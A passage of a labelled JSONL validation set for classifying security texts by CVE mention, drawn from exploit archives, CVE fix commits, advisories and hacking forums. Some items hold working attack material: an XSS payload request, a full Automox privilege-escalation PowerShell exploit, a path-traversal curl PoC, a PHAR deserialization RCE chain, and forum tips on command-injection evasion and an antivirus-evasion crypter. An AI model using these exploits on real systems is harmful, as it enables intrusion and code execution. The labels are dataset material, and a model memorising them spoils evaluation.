\">\n\n\n#PoC Request:\n\nPOST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1\nHost: localhost:8080\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 140\nOrigin: http://localhost:8080\nReferer: http://localhost:8080/admin/plugin/gallery/edit/2\nUpgrade-Insecure-Requests: 1\n\ngallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add", "source": "exploitdb", "timestamp": "2023-09-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9eaeddfd8afac2ae7cf0", "text": "Rapunzel3000: within the >1000 lines HTTP-response, I would have never figured out any reaction to command injection attemps. I can give one more recommendation: Look for different ways to start a sub-shell, as neither && not || worked for me! got it!", "source": "hackthebox", "timestamp": "2022-01-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a2928745a067eaf6f3c0", "text": "CVE: CVE-2022-0939\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.'}]\n\nFix commit: Better epub cover parsing with multiple cover-image items\nCode cosmetics\nrenamed variables\nrefactored xml page generation\nrefactored prepare author", "source": "cvefixes", "timestamp": "2022-04-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ef801c70fe589ad5907e", "text": "I’ve never used it so can’t speak to its effectiveness, but scantool seems like the most straight forward tool for reading/clearing OBDII codes. Running the command scantool should open up a GUI.", "source": "parrotsec", "timestamp": "2023-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8e0423e9e24476931dc1", "text": "CVE: CVE-2022-1032\n\n[{'lang': 'en', 'value': 'Insecure deserialization of not validated module file in GitHub repository crater-invoice/crater prior to 6.0.6.'}]\n\nFix commit: Module upload validation (#857)\n\nhttps://huntr.dev/bounties/cb9a0393-be34-4021-a06c-00c7791c7622/", "source": "cvefixes", "timestamp": "2022-03-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "36c9de60c89adc889e0a", "text": "CVE: CVE-2022-24787\n\n[{'lang': 'en', 'value': 'Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. In version 0.3.1 and prior, bytestrings can have dirty bytes in them, resulting in the word-for-word comparisons giving incorrect results. Even without dirty nonzero bytes, two bytestrings can compare to equal if one ends with `\"\\\\x00\"` because there is no comparison of the length. A patch is available and expected to be part of the 0.3.2 release. There are currently no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-7vrm-3jc8-5wwm\n\n* add more tests for string comparison\n\nexplicitly test the codepath with <= 32 bytes\n\n* refactor keccak256 helper a bit\n\n* fix bytestring equality\n\nexisting bytestring equality checks do not check length equality or for\ndirty bytes.", "source": "cvefixes", "timestamp": "2022-04-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d727a9aba44374a674f4", "text": "CVE: CVE-2022-31564\n\n[{'lang': 'en', 'value': 'The woduq1414/munhak-moa repository before 2022-05-03 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.'}]\n\nFix commit: # Absolute Path Traversal due to incorrect use of `send_file` call\n\nA path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.\n\n## Common Weakness Enumeration category\nCWE - 36\n\n## Root Cause Analysis\n\nThe `os.path.join` call is unsafe for use with untrusted input. When the `os.path.join` call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below.\n```\n>>> import os.path\n>>> static = \"path/to/mySafeStaticDir\"\n>>> malicious = \"/../../../../../etc/passwd\"\n>>> os.path.join(t,malicious)\n'/../../../../../etc/passwd'\n```\nSince the \"malicious\" parameter represents an absolute path, the result of `os.path.join` ignores the static directory completely. Hence, untrusted input is passed via the `os.path.join` call to `flask.send_file` can lead to path traversal attacks.\n\nIn this case, the problems occurs due to the following code :\nhttps://github.com/woduq1414/munhak-moa/blob/cdcc98959879c2e88a89eea164e806b3b0e09972/app.py#L273\n\nHere, the `path` parameter is attacker controlled. This parameter passes through the unsafe `os.path.join` call making the effective directory and filename passed to the `send_file` call attacker controlled. This leads to a path traversal attack.\n\n## Proof of Concept\n\nThe bug can be verified using a proof of concept similar to the one shown below.\n\n```\ncurl --path-as-is 'http:///images//../../../../etc/passwd\"'\n```\n## Remediation\n\nThis can be fixed by preventing flow of untrusted data to the vulnerable `send_file` function. In case the application logic necessiates this behaviour, one can either use the `werkzeug.utils.safe_join` to join untrusted paths or replace `flask.send_file` calls with `flask.send_from_directory` calls.\n\n## Common Vulnerability Scoring System Vector\n\nThe attack can be carried over the network. A complex non-standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to affect a change on a system resource. Hence has limited to no impact on integrity. Using this attack vector a attacker may make multiple requests for accessing huge files such as a database. This can lead to a partial system denial service. However, the impact on availability is quite low in this case. Taking this account an appropriate CVSS v3.1 vector would be\n\n(AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L)[https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L&version=3.1]\n\nThis gives it a base score of 9.3/10 and a severity rating of critical.\n\n## References\n* [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n* github/securitylab#669\n\n### This bug was found using *[CodeQL by Github](https://codeql.github.com/)*", "source": "cvefixes", "timestamp": "2022-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "18eb2084d908106e0400", "text": "Automox Agent 32 - Local Privilege Escalation\n\n# Exploit Title: Automox Agent 32 - Local Privilege Escalation\n# Date: 13/12/2021\n# Exploit Author: Greg Foss\n# Writeup: https://www.lacework.com/blog/cve-2021-43326/\n# Vendor Homepage: https://www.automox.com/\n# Software Link: https://support.automox.com/help/agents\n# Version: 31, 32, 33\n# Tested on: Windows 10\n# Language: PowerShell\n# CVE: CVE-2021-43326\n\nNew-Item -ItemType Directory -Force -Path $HOME\\Desktop\\automox\\\n$payload = \"whoami >> $HOME\\Desktop\\automox\\who.txt\"\necho \"\"\necho \"Watching for Automox agent interaction...\"\necho \"\"\nfor (($i = 0); $i -lt 500; $i++) {\n if (Test-Path -Path \\ProgramData\\amagent\\execDir*\\*.ps1) {\n try {\n $dir = Get-ChildItem \\ProgramData\\amagent\\execDir* | Select-Object Name\n $dir = $dir.name\n $file = Get-ChildItem \\ProgramData\\amagent\\$dir\\*.ps1 | Select-Object Name\n $file = $file.name\n (Get-Content -Path \\ProgramData\\amagent\\$dir\\$file -Raw) -replace \"#endregion\", \"$payload\" | Set-Content -Path \\ProgramData\\amagent\\$dir\\$file\n cp -r \\ProgramData\\amagent\\$dir $HOME\\Desktop\\automox\\\n echo 'popped :-)'\n Start-Sleep 5\n echo ''\n echo 'cloning all powershell script content...'\n for (($i = 0); $i -lt 100; $i++) {\n cp -r \\ProgramData\\amagent\\* $HOME\\Desktop\\automox\\ -Force\n Start-Sleep 1\n }\n exit\n } catch {\n throw $_.Exception.Message\n }\n } else {\n echo $i\n Start-Sleep 1\n }\n}", "source": "exploitdb", "timestamp": "2022-01-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "42ea22903b12b5e2a745", "text": "Everytime i’m looking for clues i always see you invested here helping people. Thanks a lot man!", "source": "hackthebox", "timestamp": "2023-09-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "6dd0c4b8a598792a4276", "text": "Here is the original syntax from HTB on the “find files and directories” page. find / -type f -name *.conf -user root -size +20k -newermt 2020-03-03 -exec ls -al {} \\; 2>/dev/null So start breaking it down. Do you need a -user since you are already logged in? no. Scratch that. Now we have this. find / -type f -name *.conf -size +20k -newermt 2020-03-03 -exec ls -al {} \\; 2>/dev/null Does the question ask for size of the files? No. Scratch that and now we have this. find / -type f -name *.conf -newermt 2020-03-03 -exec ls -al {} \\; 2>/dev/null Does the question ask for a date for the file? No. Scratch that. And now we have this. find / -type f -name *.conf -exec ls -al {} \\; 2>/dev/null Does the question ask for a .conf file? No it asks for a log file. Scratch and edit. And now we have this. find / -type f -name *.log -exec ls -al {} \\; 2>/dev/null I did not get a number to count. But I do know how to add the results. Or, be goofy and copy and paste into excel to get your number. I did notice that a lot of comments had things like \"\" in their syntax and added a few flags outside of the original syntax. Although its awesome to be creative and in fact some of those syntax add-ons may work elsewhere, just remember that HTB is not trying to throw you for a loop. If its not in the Modules then it probably wont work. Stick to whats being taught. If it aint broke, dont fix it. **ring ring** Call Center: Call cneter to fix all your computer needs, may I help you? Caller: My computer isnt working. Help! Call Center: is it plugged in? Sometimes the simplest things work best. Use the KISS method. Keep It Simple Stupid Happy Hunting.", "source": "hackthebox", "timestamp": "2022-05-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3a6aaddb0ef144c536fe", "text": "Jason: been using various Linux distros for 12 years or so. Hi @Jason (Pastor) The easiest way to go is to get a CompTIA A+ certification and work either via phone (tech support/help desk) or on location (IT technician). The tech support positions are either in a call center or work at home via phone. Then you can study to get other certifications (like the CompTIA Network+, CompTIA Linux+, Cisco CCNA, etc.) to move up and get better pay. I think the A+ is being updated soon to a new version, which CompTIA does every 3 years. Here’s the guy who helped me get my A+ back in 2010 and Network+ in 2012. Free video courses on YouTube with monthly live study sessions.", "source": "parrotsec", "timestamp": "2022-09-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2aae013f8979878b6203", "text": "Relwarc17: https://www.hackthebox.eu/home/users/profile/42767 I didn’t know the path to my profile (when i opened profile the path didn’t show up in the URL bar, i knew only my number) Thank you, i gave you respect for this.", "source": "hackthebox", "timestamp": "2022-04-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7a45bf71e3be16d0ff6b", "text": "Feel free to DM me at anytime. I am East Coast US. so keep that in mind. It sounds like you are there, have you tried getting the flag to display in that error message? Or maybe copying? If you are using mv maybe it will not work. If you are still having trouble, just DM me with a screenshot, or the line of code you are using on the target server. -onthesauce", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "204800e2e9fa243f8d61", "text": "Hello, 1.) Regarding the penultimate question: Name is Harry Potter. Generate a Username List (Username Generator) and a Pass List with CUPP (see Akiraowen’s post above!), RegEx it and that should work. 2.) However for the very last question: There is a second (SSH-) user account, G.Potter. We are supposed to brute force on the victim machine using the provided RockYou-30 wordlist. This won’t work and I have no idea what else could be tried.", "source": "hackthebox", "timestamp": "2022-01-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2716b21bfe1cf912872b", "text": "Please for the love of god help me before i loose my mind. got up to the last assesment no problem and have been on this for a week!!!", "source": "hackthebox", "timestamp": "2022-01-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e9ff8e9cf6e93eeeec2d", "text": "Thank you. Have you any guidance as to how to learn more about this subject? As far as tools go it seems as if it is one of the harder ones to learn anything about. You can do a web search on metasploit for example and find a thousand ways to exploit a windows xp and if lucky a little more, but leaning about how to exploit a car seems a subject rarely shared.", "source": "parrotsec", "timestamp": "2023-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3119e9a1ea9bcdf301a7", "text": "CVE: CVE-2022-25352\n\n[{'lang': 'en', 'value': 'The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930)'}]\n\nFix commit: better fix for prototype pollution vulnerability\n\ncheers Idan Digmi of Snyk Security", "source": "cvefixes", "timestamp": "2022-03-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "87d1db968b7f8e4e1871", "text": "Hi. Are we talking about your router, right? You should find the gateway to access it via your browser. This thread is not about Parrot.", "source": "parrotsec", "timestamp": "2022-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7efc0bf0fb5c358a8fbd", "text": "CVE: CVE-2022-34835\n\n[{'lang': 'en', 'value': 'In Das U-Boot through 2022.07-rc5, an integer signedness error and resultant stack-based buffer overflow in the \"i2c md\" command enables the corruption of the return address pointer of the do_i2c_md function.'}]\n\nFix commit: i2c: fix stack buffer overflow vulnerability in i2c md command\n\nWhen running \"i2c md 0 0 80000100\", the function do_i2c_md parses the\nlength into an unsigned int variable named length. The value is then\nmoved to a signed variable:\n\n int nbytes = length;\n #define DISP_LINE_LEN 16\n int linebytes = (nbytes > DISP_LINE_LEN) ? DISP_LINE_LEN : nbytes;\n ret = dm_i2c_read(dev, addr, linebuf, linebytes);\n\nOn systems where integers are 32 bits wide, 0x80000100 is a negative\nvalue to \"nbytes > DISP_LINE_LEN\" is false and linebytes gets assigned\n0x80000100 instead of 16.\n\nThe consequence is that the function which reads from the i2c device\n(dm_i2c_read or i2c_read) is called with a 16-byte stack buffer to fill\nbut with a size parameter which is too large. In some cases, this could\ntrigger a crash. But with some i2c drivers, such as drivers/i2c/nx_i2c.c\n(used with \"nexell,s5pxx18-i2c\" bus), the size is actually truncated to\na 16-bit integer. This is because function i2c_transfer expects an\nunsigned short length. In such a case, an attacker who can control the\nresponse of an i2c device can overwrite the return address of a function\nand execute arbitrary code through Return-Oriented Programming.\n\nFix this issue by using unsigned integers types in do_i2c_md. While at\nit, make also alen unsigned, as signed sizes can cause vulnerabilities\nwhen people forgot to check that they can be negative.\n\nSigned-off-by: Nicolas Iooss \nReviewed-by: Heiko Schocher ", "source": "cvefixes", "timestamp": "2022-06-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "607b6720488ab3812f2b", "text": "You can get the seclists from the github repo; GitHub GitHub - danielmiessler/SecLists: SecLists is the security tester's... SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, ... and you just need to unpack it to; /usr/share/seclists", "source": "parrotsec", "timestamp": "2023-04-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8f270e545c0be1819b6f", "text": "CVE: CVE-2022-0401\n\n[{'lang': 'en', 'value': 'Path Traversal in NPM w-zip prior to 1.0.12.'}]\n\nFix commit: fix: change output to filename for Disclosure/DoS/RCE", "source": "cvefixes", "timestamp": "2022-02-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "31e44b122d1c2e694904", "text": "The best is the official one and by Google. Here are links to them https://docs.python.org/3/tutorial/ https://developers.google.com/edu/python", "source": "go4expert", "timestamp": "2023-03-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5c2422564a32fbb5c6bd", "text": "CVE: CVE-2022-24950\n\n[{'lang': 'en', 'value': \"A race condition exists in Eternal Terminal prior to version 6.2.0 that allows an authenticated attacker to hijack other users' SSH authorization socket, enabling the attacker to login to other systems as the targeted users. The bug is in UserTerminalRouter::getInfoForId().\"}]\n\nFix commit: red fixes (#468)\n\n* red fixes\r\n\r\n* remove magic number", "source": "cvefixes", "timestamp": "2022-08-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "553332111e6accce3804", "text": "Was stuck at this for quite some time - for anyone struggling, here is (roughly) how the process of solving this one goes: Make a list of all operations you have access to - e.g search, copy, move Check which ones make network requests - this should only leave you with 2 requests to focus on . Check which parameters they have - from, to, finish etc. Don’t focus on any specific one of these parameters, I wasted quite some time on one, only to solve it with another. After you’ve decided which parameter to start testing with, you need the following - a way to start a subshell ( &&, || or ; ) and a goal (do you want to move the flag to a directory and read it, do you want to cat it’s contents? If catting - what output to - the page, or an error message?). After you’ve thought about this, craft different payloads to test. Will you obfuscate your command through base64? Or inserting quote marks between some characters? Try different things. Remember that some characters are blacklisted, so you will have to substitute them using PATH or something else, as other posters have said before. It was quite the frustrating exercise - I was super close from the get-go, but the errors threw me off and I wasted a lot of time afterwards crafting other payloads & trying commix (an automated tool for OS command injection detection ). Hope this helps someone - if you’re still stuck DM me and I might be able to give you a better nudge.", "source": "hackthebox", "timestamp": "2023-01-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "fe0362c144298cf70e8c", "text": "CVE: CVE-2021-3715\n\n[{'lang': 'en', 'value': 'A flaw was found in the \"Routing decision\" classifier in the Linux kernel\\'s Traffic Control networking subsystem in the way it handled changing of classification filters, leading to a use-after-free condition. This flaw allows unprivileged local users to escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.'}]\n\nFix commit: net_sched: cls_route: remove the right filter from hashtable\n\nroute4_change() allocates a new filter and copies values from\nthe old one. After the new filter is inserted into the hash\ntable, the old filter should be removed and freed, as the final\nstep of the update.\n\nHowever, the current code mistakenly removes the new one. This\nlooks apparently wrong to me, and it causes double \"free\" and\nuse-after-free too, as reported by syzbot.\n\nReported-and-tested-by: syzbot+f9b32aaacd60305d9687@syzkaller.appspotmail.com\nReported-and-tested-by: syzbot+2f8c233f131943d6056d@syzkaller.appspotmail.com\nReported-and-tested-by: syzbot+9c2df9fd5e9445b74e01@syzkaller.appspotmail.com\nFixes: 1109c00547fc (\"net: sched: RCU cls_route\")\nCc: Jamal Hadi Salim \nCc: Jiri Pirko \nCc: John Fastabend \nSigned-off-by: Cong Wang \nSigned-off-by: David S. Miller ", "source": "cvefixes", "timestamp": "2022-03-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9cd32cff4741cb275264", "text": "CVE: CVE-2022-24869\n\n[{'lang': 'en', 'value': \"GLPI is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing. In versions prior to 10.0.0 one can use ticket's followups or setup login messages with a stylesheet link. This may allow for a cross site scripting attack vector. This issue is partially mitigated by cors security of browsers, though users are still advised to upgrade.\"}]\n\nFix commit: Merge pull request from GHSA-p94c-8qp5-gfpx", "source": "cvefixes", "timestamp": "2022-04-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a2999e9311c899957e36", "text": "For anyone else who may be stuck troubleshooting. Here are some options to try, I was stuck too. Read through all 3, you may have missed one. A (yes I had to append one haha). If you put in the ip address into the browser and it wont let you see the unika.htb, you need to resolv the /etc/hosts file for the DNS server because the server is a server running HTB VM boxes, and they all share the same outgoing IP, so the domain name doesn’t know what ip to attach to. go into > cd /etc/hosts and add the ‘IPADDRESS (tab space) unika.htb’, aparently you will have to do this over and over for htb boxes when its a web server to view the page for more enumeration…I just wanted to use the word enumeration to sound smart. 1 Make sure the interface you use when you start Responder is the interface that is connected to the HTB box. For me it was openvpn, so tun0. 2 Also make sure you are connected to the HTB box in the same environment you are running Responder, I was using tools in my Kali VM, but running the openvpn connection on my mac, so couldn’t read the traffic. 3 Once responder is up and running properly ‘python3 Responder.py -I tun0’, then make sure when you enter the web browser address to add smb payload ‘ http://unika.htb/?page=//ipaddress/whatever ’, the IPADDRESS is NOT the Responder HTB server you used to nmap earlier, its the ipaddress connected to our openvpn connection!. You can check this with ifconfig in kali or linux, and see what tun0 ip is or JUST GO into the running responder listening and look at the responder IP address after the responder NIC line of code…make sure you use that in the web address attack with page= :). Hope this helps.", "source": "hackthebox", "timestamp": "2023-12-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0652f4a563eb5a377c08", "text": "AntiVirus Evasion With Exocet\n\nHello, I have tried many tools and tried ways to generate an undetectable payload but none of them worked. Now I came across this tool and today I was able to bypass Windows Defender successfully. That’s why I want to share this with you on this forum. And I hope you will have as much success as me. Have fun! AntiVirus Evasion With Exocet Hello aspiring Ethical Hackers. In this article, you will learn about AntiVirus Evasion with the help of a tool named Exocet. Exocet is a Crypter type malware dropper. A Crypter is a software that is used to make malware undetectable. It performs functions such as encrypting, obfuscating and manipulating the code of the malware to make it undetectable. Hackercool Magazine – 20 Mar 22 AntiVirus Evasion With Exocet - Hackercool Magazine Exocet is a Crypter Malware Dropper that generates undetectable payloads for Windows. AntiVirus Evasion is Estimated reading time: 5 minutes Vulners Database – 15 Nov 21 EXOCET - AV-evading, Undetectable, Payload Delivery Tool EXOCET is superior to Metasploit's \"Evasive Payloads\" modules as EXOCET uses AES-256 in GCM Mode (Galois/Counter Mode). Metasploit's Evasion Payloads uses a easy to detect RC4 encryption. While RC4 can decrypt faster, AES-256 is much more difficult... GitHub GitHub - tanc7/EXOCET-AV-Evasion: EXOCET - AV-evading, undetectable, payload... EXOCET - AV-evading, undetectable, payload delivery tool - GitHub - tanc7/EXOCET-AV-Evasion: EXOCET - AV-evading, undetectable, payload delivery tool", "source": "hackersploit", "timestamp": "2022-03-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "753825eab5f0550b479e", "text": "denpakei: OST2 is related somehow to Parrot OS? or it’s just learning source you recommend? OST2 has nothing to do with Parrot OS. It is 1 of best free learning courses out there", "source": "parrotsec", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ce5c881d9112f554f6f2", "text": "I am looking for people who can hide their ass and work with them. I see beautiful ideas here. Good learning from you guys. Always buy used devices. Trust me it helps. Always use an RDP regardless your layers of protection.", "source": "hackersploit", "timestamp": "2022-07-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "964acfe562ac61ff4076", "text": "CVE: CVE-2022-31133\n\n[{'lang': 'en', 'value': 'HumHub is an Open Source Enterprise Social Network. Affected versions of HumHub are vulnerable to a stored Cross-Site Scripting (XSS) vulnerability. For exploitation, the attacker would need a permission to administer the Spaces feature. The names of individual \"spaces\" are not properly escaped and so an attacker with sufficient privilege could insert malicious javascript into a space name and exploit system users who visit that space. It is recommended that the HumHub is upgraded to 1.11.4, 1.10.5. There are no known workarounds for this issue.'}]\n\nFix commit: Fix format of displaying user profile title field on \"People\" page (#5797)", "source": "cvefixes", "timestamp": "2022-07-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1993d40b69b26f897eaf", "text": "Wow, ive been stuck on this forever. Seriously wtf why would it specifically say to log into no machine ans then ask a question completely unrelated?!", "source": "hackthebox", "timestamp": "2022-08-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1e014150ebdeff1a7740", "text": "Thanks mate, this was very unintuitive i dont want to have to click “Hint”", "source": "hackthebox", "timestamp": "2023-08-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0af3d242d1fce38b476a", "text": "CVE: CVE-2022-35923\n\n[{'lang': 'en', 'value': \"v8n is a javascript validation library. Versions of v8n prior to 1.5.1 were found to have an inefficient regular expression complexity in the `lowercase()` and `uppercase()` regex which could lead to a denial of service attack. In testing of the `lowercase()` function a payload of 'a' + 'a'.repeat(i) + 'A' with 32 leading characters took 29443 ms to execute. The same issue happens with uppercase(). Users are advised to upgrade. There are no known workarounds for this issue.\"}]\n\nFix commit: fix inefficient regular expressions on lowercase and uppercase rules", "source": "cvefixes", "timestamp": "2022-08-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "df9c1f90d9746165bf9d", "text": "HTB gives us enough to overcome the module, and well, seeing that they have already provided the answer above, I feel free to express how I solved it. So, HTB gives us the following subdomain: www.inlanefreight.htb . The first thing we would need to do is enumerate the domain inlanefreight.htb: curl -s inlanefreight.htb With this, we obtain the first flag. There is another way to obtain this flag and the following ones. If we interact by fuzzing the vhosts, we find that it gives us a status code of 200. Even when trying with vhosts that would be very unlikely to exist, such as ffmeshfetGFG.inlanefreight.htb, it still returns 200. One thing I noticed is that the “Content-Length” for non-existent Vhosts is always 10918. Using ffuf with this information, the command looks like this: ffuf -w ./vhost -H \"Host: FUZZ.inlanefreight.htb\" -u http://10.129.136.58 -fs 10918 With a bit of patience, we will apply a curl to each discovered VHOST, obtaining the flag.", "source": "hackthebox", "timestamp": "2023-12-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bdf950c81614147ae02f", "text": "Snappy PHAR deserialization vulnerability\n\n[Severity: CRITICAL]\n\n## Issue\n\nOn March 17th the vulnerability [CVE-2023-28115 was disclosed](https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc), allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the `phar://` wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of the `phar://` string, it can be bypassed to achieve remote code execution again using a different case.\n\nAs for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the `phar://` wrapper.\n\n## Technical details\n\n### Description\n\nThe following [patch](https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6) was committed on the 1.4.2 release to fix CVE-2023-28115.\n\n\n\nIf the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files.\n\nTo fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`.\n\n### Proof of Concept\n\nTo illustrate the vulnerability, the `/tmp/exploit` file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using [phpggc](https://github.com/ambionics/phpggc) with the `-f` option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called.\n\n```bash\n$ phpggc -f Monolog/RCE1 exec 'touch /tmp/exploit' -p phar -o exploit.phar\n```\nThe following `index.php` file will be used to trigger the vulnerability via the payload `PHAR://exploit.phar`.\n\n```bash\ngenerateFromHtml('POC ', 'PHAR://exploit.phar');\n```\nFinally once executed, the `/tmp/exploit` file is successfully created on the filesystem.\n\n```bash\n$ php index.php \nFatal error: Uncaught InvalidArgumentException: The output file 'PHAR://exploit.phar' already exists and it is a directory. in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php:634\nStack trace:\n#0 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(178): Knp\\Snappy\\AbstractGenerator->prepareOutput('PHAR://exploit.phar', false)\n#1 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/Pdf.php(36): Knp\\Snappy\\AbstractGenerator->generate(Array, 'PHAR://exploit.phar', Array, false)\n#2 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(232): Knp\\Snappy\\Pdf->generate(Array, 'PHAR://exploit.phar', Array, false)\n#3 /var/www/index.php(12): Knp\\Snappy\\AbstractGenerator->generateFromHtml('POC ', 'PHAR://exploit.phar')\n#4 {main}\n thrown in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php on line 634\n \n$ ls -l /tmp/exploit\n-rw-r--r-- 1 user_exploit user_exploit 0 Jun 14 10:05 exploit\n```\n\nThis proof of concept is based on the original one published with CVE-2023-28115.\n\n### Impact\n\nA successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8.\n\n", "source": "github_advisory", "timestamp": "2023-09-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "36901abf3ed4cc6438bc", "text": "rkhunter and chkrootkit mostly use the fileExists method with hardcoded paths. The scope is to find known rootkits, which was really really old and outdated. ClamAV is the best option in here. However, it still detects known malware signatures. The best way to check backdoor inside system is check processes, network activities, file date creations, … and so many methods. It depends on threat actors and the complexity of backdoor’s design.", "source": "parrotsec", "timestamp": "2022-02-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "24f46b0522030ed45cec", "text": "Not sure what happened exactly but I can say it was not caused by “scanning your network with wireshark”. Wireshark is a passive collection tool. All packets that hit that interface are captured.", "source": "parrotsec", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0cca85f70d56e1fd1efb", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-09-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "045fd480aa94eb0b67f9", "text": "CVE: CVE-2022-25867\n\n[{'lang': 'en', 'value': 'The package io.socket:socket.io-client before 2.0.1 are vulnerable to NULL Pointer Dereference when parsing a packet with with invalid payload format.'}]\n\nFix commit: fix: ensure the payload format is valid\n\nThis commit should prevent some NPE issues encountered after the\nparsing of the packet.\n\nRelated:\n\n- https://github.com/socketio/socket.io-client-java/issues/642\n- https://github.com/socketio/socket.io-client-java/issues/609\n- https://github.com/socketio/socket.io-client-java/issues/505", "source": "cvefixes", "timestamp": "2022-08-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
